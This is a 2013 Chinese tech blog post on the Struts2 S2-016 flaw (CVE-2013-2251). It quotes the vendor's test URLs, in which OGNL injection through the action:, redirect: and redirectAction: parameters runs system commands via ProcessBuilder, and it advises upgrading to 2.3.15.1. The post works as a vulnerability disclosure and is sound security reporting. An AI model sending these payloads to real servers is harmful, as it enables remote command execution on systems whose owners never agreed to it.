Struts 2.0.0 - Struts 2.3.15漏洞来袭 - 897371388 - ITeye博客

`

897371388

浏览: 529518 次

最近访客更多访客>>

u012363178

ncx1259988

心杀心

lzj89566062

博主相关

博客

微博

相册

收藏

留言

关于我

文章分类

全部博客 (1025)

社区版块

存档分类

2013-11 ( 336)
2013-10 ( 118)
2013-09 ( 56)
更多存档...

最新评论

chaodilei：我可以提个意见吗？作为前端工程师，写博客应该注意段落标题的ba ...
我的前端之路
zhuchao_ko：大家一起二。
我的前端之路

Struts 2.0.0 - Struts 2.3.15漏洞来袭

阅读更多

Struts官网又公布了一个涉及Struts 2.0.0 - Struts 2.3.15的漏洞，CVE-2013-2251，并给出了漏洞测试的方法：

简单表达式： - the parameter names are evaluated as OGNL.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
命令执行：
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

详情页面：http://struts.apache.org/release/2.3.x/docs/s2-016.html

此漏洞一出，昨天（2013年7月17日）乌云漏洞平台上提交Struts2相关漏洞的数量剧增：

由于国内使用Struts2的网站太多，连一些大站也中招，比如淘宝、腾讯、网易等，官网给出的解决方案为：强烈建议升级到Struts 2.3.15.1！

分享到：

ubuntu 下安装 pthread man 遇到的一些问 ... | 三千万数据量下redis2.4的一统计情况

2013-07-18 08:46
浏览 814
评论(0)
查看更多

评论

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

mina-core-2.0.0-RC1.jar，mina-filter-compression-2.0.0-RC1.jar: mina-core-2.0.0-RC1.jar，mina-filter-compression-2.0.0-RC1.jar，mina-transport-apr-2.0.0-RC1.jar

spark-2.0.0-bin-hadoop2.6.tgz: 本资源是spark-2.0.0-bin-hadoop2.6.tgz百度网盘资源下载,本资源是spark-2.0.0-bin-hadoop2.6.tgz百度网盘资源下载

struts2-core.jar: struts2-core-2.0.1.jar, struts2-core-2.0.11.1.jar, struts2-core-2.0.11.2.jar, struts2-core-2.0.11.jar, struts2-core-2.0.12.jar, struts2-core-2.0.14.jar, struts2-core-2.0.5.jar, struts2-core-2.0.6.jar,...

tensorflow-2.0.0-cp37-none-linux_armv7l.whl: tensorflow-2.0.0-cp37-none-linux_armv7l.whl

nacos-server-2.0.0-ALPHA.1下载，内容包含windows与linux的nacso2.0.0版本: 资源里面包含 nacos-server-2.0.0-ALPHA.1.tar.gz nacos-server-2.0.0-ALPHA.1.zip

triton-2.0.0-cp310-cp310-win_amd64.whl: triton-2.0.0-cp310-cp310-win_amd64.whl

Struts 2.0.0 - Struts 2.3.14.1 URL及A标签远程命令执行漏洞探测 V1.1: 《Struts 2.0.0 - Struts 2.3.14.1 URL及A标签远程命令执行漏洞探测 V1.1》使用说明：运行EXE程序，输入扫描站点的任意一个URL入口链接地址，若提示扫描是否包含顶级域名下的所有页面，根据提示输入即可。 ...

spark-2.0.0-bin-hadoop2.7.tgz.zip: spark-2.0.0-bin-hadoop2.7.tgz.zip 提示：先解压再使用，最外层是zip文件

tensorflow-2.0.0-cp37-cp37m-win_amd64.whl: tensorflow-2.0.0-cp37-cp37m-win_amd64.whl tensorflow-2.0.0-cp37-cp37m-win_amd64.whl

apache-hive-2.0.0-bin.tar: apache-hive-2.0.0-bin.tar

struts-2.0.0-lib: 这是struts-2.0.0中lib的jar压缩包，我也是网上下载的

linuxqq_2.0.0-b2-1084_x86_64.rpm: linuxqq_2.0.0-b2-1084_x86_64.rpm

mina2.0 含11个jar包: mina-core-2.0.0-M6.jar mina-example-2.0.0-M6.jar mina-filter-codec-netty-2.0.0-M6.jar mina-filter-compression-2.0.0-M6.jar mina-integration-beans-2.0.0-M6.jar mina-integration-jmx-2.0.0-M6.jar mina-...

linuxqq_2.0.0-b2-1084_x86_64.sh: linuxqq_2.0.0-b2-1084_x86_64.sh

linuxqq_2.0.0-b2-1089_amd64.deb: linuxqq_2.0.0-b2-1089_amd64.deb

SenchaSDKTools-2.0.0-Beta-windows: SenchaSDKTools-2.0.0-Beta-windows

kafka-clients-2.0.0-API文档-中英对照版.zip: 赠送原API文档：kafka-clients-2.0.0-javadoc.jar；赠送源代码：kafka-clients-2.0.0-sources.jar；赠送Maven依赖信息文件：kafka-clients-2.0.0.pom；包含翻译后的API文档：kafka-clients-2.0.0-javadoc-API文档...

mina-core-2.0.0-RC1-sources.jar: mina-core-2.0.0-RC1-sources.jar

bazel-2.0.0-installer-linux-x86_64.sh: linux下bazel2.0.0，适合tensorflow-master编译。解决在github上该文件难以下载的问题。

Global site tag (gtag.js) - Google Analytics